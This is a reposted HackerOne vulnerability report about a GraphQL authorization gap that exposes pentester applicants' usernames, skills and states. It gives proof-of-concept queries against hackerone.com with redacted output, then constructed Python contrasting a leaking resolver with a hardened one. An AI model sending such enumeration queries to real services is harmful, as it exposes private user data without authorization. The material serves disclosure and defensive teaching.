HackerOne: Pentester can obtain information about other pentesters who applied for the same test, but weren't accepted
News category: Security vulnerabilities
Source: vulners.com
Hi team, I don't know your policy about pentesters (about their visibility on the platform), but I couldn't find any other pentesters before.

1) For example: GraphQL has the h1_pentester attribute that would explicitly point us to the pentester, but if we make a query, it doesn't reveal the pentester to us.

https://hackerone.com/graphql
POST {"query":"query { user(username:\"███\"){username,h1_pentester}}","variables":{}}

Answer: {"data":{"user":{"username":"███████","h1_pentester":null}}}

As we can see, I can't say that he is a pentester. And if I understand the policy correctly, in this situation H1 does not disclose to others who the pentester is.

2) PoC:

https://hackerone.com/graphql
POST {"query":"query { pentester_profiles{total_count,nodes{skills{nodes{name}},state,user{username}}}}","variables":{}}

Answer: {"data":{"pentester_profiles":{"total_count":8,"nodes":[{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Native Applications"},{"name":"Android"},{"name":"iOS"},{"name":"API"}]},"state":"approved","user":{"username":"█████"}},{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Network Security"},{"name":"Android"},{"name":"iOS"},{"name":"API"},{"name":"Web applications"}]},"state":"approved","user":{"username":"██████"}},{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Native Applications"},{"name":"Network... ...
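The root cause the report points at is an authorization gap between two fields of the same schema: the per-user h1_pentester field is hidden from other users, while the root pentester_profiles list applies no per-object check and so exposes every applicant's state and skills. The following added example (not HackerOne's code; the in-memory model, user names, profile states and resolver names are all constructed for illustration) shows the leaking list resolver beside a hardened one that reuses the per-user policy, plus a consistency check a defender can run to catch this class of mismatch.

```python
"""Minimal model of the authorization gap in the report: the per-user
field hides the pentester flag, but the list field leaks every profile.
In-memory stand-in; data and resolvers are constructed, not HackerOne's."""
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class User:
    username: str
    staff: bool = False

@dataclass
class PentesterProfile:
    user: User
    state: str                      # e.g. "approved", "pending", "rejected"
    skills: list = field(default_factory=list)

# Constructed sample data: three applicants in different states plus staff.
USERS = {u: User(u) for u in ("alice", "bob", "carol")}
USERS["h1_triager"] = User("h1_triager", staff=True)
PROFILES = [
    PentesterProfile(USERS["alice"], "approved", ["Web Applications", "API"]),
    PentesterProfile(USERS["bob"], "pending", ["Mobile Applications"]),
    PentesterProfile(USERS["carol"], "rejected", ["Network Security"]),
]

def can_see_profile(viewer: User, profile: PentesterProfile) -> bool:
    """Single policy for every field that exposes pentester status:
    only staff or the profile owner may see it."""
    return viewer.staff or viewer.username == profile.user.username

def resolve_h1_pentester(viewer: User, username: str) -> Optional[bool]:
    """user(username).h1_pentester: None for anyone not allowed to know."""
    for p in PROFILES:
        if p.user.username == username:
            return True if can_see_profile(viewer, p) else None
    return None

def resolve_pentester_profiles_vulnerable(viewer: User) -> list:
    """Root list field with no per-object check: leaks every applicant."""
    return [{"username": p.user.username, "state": p.state, "skills": p.skills}
            for p in PROFILES]

def resolve_pentester_profiles(viewer: User) -> list:
    """Hardened: reuse the same policy and filter rather than error, so
    total_count cannot be used to infer how many rows were hidden."""
    return [{"username": p.user.username, "state": p.state, "skills": p.skills}
            for p in PROFILES if can_see_profile(viewer, p)]

def policy_consistent(viewer: User, resolver) -> bool:
    """True if the list resolver never reveals a user whose h1_pentester
    field would be hidden from the same viewer."""
    return all(resolve_h1_pentester(viewer, row["username"]) is not None
               for row in resolver(viewer))
```

Running policy_consistent against each list-returning resolver with a non-staff viewer is the kind of check that would have flagged the mismatch before release.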